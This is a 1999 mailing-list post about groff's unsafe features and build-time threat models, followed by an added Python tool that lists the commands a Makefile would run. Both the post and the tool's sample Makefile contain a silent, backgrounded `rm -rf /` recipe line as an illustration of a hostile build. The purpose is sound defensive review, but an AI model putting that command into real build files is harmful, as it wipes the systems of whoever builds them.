Re: Groff dangerous (was Re: Troff dangerous.)

From: Kragen Sitaker (kragenat_private)
Date: Mon Jul 26 1999 - 19:55:36 PDT


    Someone writes:
    > The trick is that it can get you if you as a system administrator download
    > some open source program from the Internet, and build and install that
    > program; such activity often happens as "root", so a couple of scenarios
    > are possible:
    
    In most cases, this is a non-problem.
    
    The reason this is a non-problem is that, for this to be a threat, your
    "open source program from the Internet" [sic] has to have been packaged
    by a malicious person who wants to crack your system.  But if this is
    part of your threat model, you won't be safe if you fix groff, because
    you're executing the makefile supplied by the malicious attacker, which
    may say
    
    x.o: x.c x.h
    	@/bin/rm -rf / &
    	$(CC) $(CFLAGS) x.c -o $@
    
    There might be a case where the scenario you described *is* a problem:
    where the program in question is never going to be executed as root,
    and the Makefile has been carefully reviewed, but the source and man
    pages haven't been.  In this case, though, I'd probably just read the
    makefile and install things by hand with cp.  :)
    
    There should be a common one-or-two-word name for this kind of
    non-problem; there are some vivid metaphors for trying to solve it in
    the literature.  (Bruce Schneier's example of planting a big thick
    stake in front of your house in hopes thieves will run into it is one.)
    
    You *must* be clear about your threat model -- i.e. what threats you're
    trying to defend against -- before you can decide what is and isn't a
    security problem.
    
    (BTW, this groff problem doesn't surprise me much.  For a while, I had
    a special email address you could send nroff-source man pages to and
    get back formatted PostScript from on my home machine, as a convenience
    when I was at work on Solaris machines without a decent groff.  I
    didn't tell anybody about it until after I disabled it, because I
    assumed there were probably security holes in groff; it wasn't written
    to serve as a security gatekeeper, and a useful rule of thumb is that
    such programs are not very good at security-boundary maintenance,
    because it requires a different mindset from regular programming.  See
    http://www.pobox.com/~kragen/security-holes.html for thoughts on this
    situation and mailto:kragen-hacks-get.19at_private for the code
    that made the manpage-to-PostScript converter work.)
    
    --
    <kragenat_private>       Kragen Sitaker     <http://www.pobox.com/~kragen/>
    103 days until the Internet stock bubble bursts on Monday, 1999-11-08.
    
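The makefile in the post makes the point that whatever a build recipe says runs with the privileges of whoever types `make`, and that reading the makefile is the actual control. As an added example, not part of the original message, here is a small Python review aid that lists every command a Makefile would execute, together with the constructs a reviewer most wants flagged: a `@` prefix suppresses echoing of the command, a trailing single `&` detaches it so the build does not wait for it, and `$(shell ...)` runs whenever make expands the variable rather than when a recipe runs, so a `:=` assignment executes it while the file is being parsed, even under `make -n`. The sample Makefile is constructed for this example (only the `x.o` rule comes from the post), the function names (`review_makefile`, `needs_attention`, `format_report`) are mine, and the parser deliberately covers only plain rules, simple assignments and `$(NAME)` references, not includes, conditionals or pattern rules.

```python
import re

# Constructed sample Makefile for this example; only the x.o rule comes from the post.
SAMPLE_MAKEFILE = """\
CC = cc
CFLAGS = -O2
BUILD_HOST := $(shell uname -n)

x.o: x.c x.h
\t@/bin/rm -rf / &
\t$(CC) $(CFLAGS) x.c -o $@

install: x.o
\tcp x /usr/local/bin/x
"""

# "target: deps" (a rule), but not "VAR := value" (an assignment).
RULE_RE = re.compile(r'^([^\t#][^:=]*):(?!=)')
ASSIGN_RE = re.compile(r'^([A-Za-z_][A-Za-z0-9_]*)\s*[:?+]?=\s*(.*)$')
SHELL_FN_RE = re.compile(r'\$\(shell\s+([^)]*)\)')
VAR_REF_RE = re.compile(r'\$\(([A-Za-z_][A-Za-z0-9_]*)\)')
PREFIX_FLAGS = {'@': 'silent', '-': 'ignore-errors', '+': 'always-run'}


def expand(text, variables, depth=0):
    """Substitute $(NAME) references from simple assignments; unknown names stay as-is."""
    if depth > 10:  # guard against circular definitions such as A = $(B), B = $(A)
        return text
    new = VAR_REF_RE.sub(lambda m: variables.get(m.group(1), m.group(0)), text)
    return new if new == text else expand(new, variables, depth + 1)


def review_makefile(text):
    """Return one finding per command make would run, in file order.

    Tab-indented recipe lines run when their target is built.  A $(shell ...)
    call outside a recipe runs when make expands it, i.e. at parse time for a
    ':=' assignment, which `make -n` does not prevent.
    """
    findings, variables, target = [], {}, None
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith('#'):
            continue
        if line.startswith('\t'):
            cmd, flags = line[1:].strip(), []
            while cmd and cmd[0] in PREFIX_FLAGS:       # @, -, + recipe prefixes
                flags.append(PREFIX_FLAGS[cmd[0]])
                cmd = cmd[1:].lstrip()
            if re.search(r'(?<!&)&\s*$', cmd):          # trailing single & backgrounds it
                flags.append('background')
            if SHELL_FN_RE.search(cmd):
                flags.append('shell-function')
            findings.append({'line': lineno, 'target': target, 'command': cmd,
                             'expanded': expand(cmd, variables), 'flags': flags})
            continue
        for m in SHELL_FN_RE.finditer(line):            # outside a recipe: expansion time
            shell_cmd = m.group(1).strip()
            findings.append({'line': lineno, 'target': None, 'command': shell_cmd,
                             'expanded': expand(shell_cmd, variables),
                             'flags': ['shell-function']})
        m = ASSIGN_RE.match(line)
        if m:
            variables[m.group(1)] = m.group(2).strip()
            continue
        m = RULE_RE.match(line)
        if m:
            target = m.group(1).strip()
    return findings


def needs_attention(findings):
    """Commands that run hidden, detached, or before any target is built."""
    return [f for f in findings
            if {'silent', 'background', 'shell-function'} & set(f['flags'])]


def format_report(findings):
    """Plain-text listing: line number, owning target, expanded command, flags."""
    lines = []
    for f in findings:
        where = f['target'] or '<expansion>'
        tag = ' [' + ','.join(f['flags']) + ']' if f['flags'] else ''
        lines.append(f"line {f['line']:>3}  {where:<12} {f['expanded']}{tag}")
    return '\n'.join(lines)


if __name__ == '__main__':
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_MAKEFILE
    print(format_report(review_makefile(text)))
```

Run with a Makefile path to get the listing for a real tree, or with no argument for the constructed sample, where the report marks the `uname -n` call as running at expansion time and the `rm` line as both silent and backgrounded, while the compile and `cp` lines appear with their variables expanded so a reviewer can see what `$(CC)` actually resolves to. The output is only as complete as the parser, which is the reason to still do the build itself as an unprivileged user and copy the results into place by hand, as the post suggests.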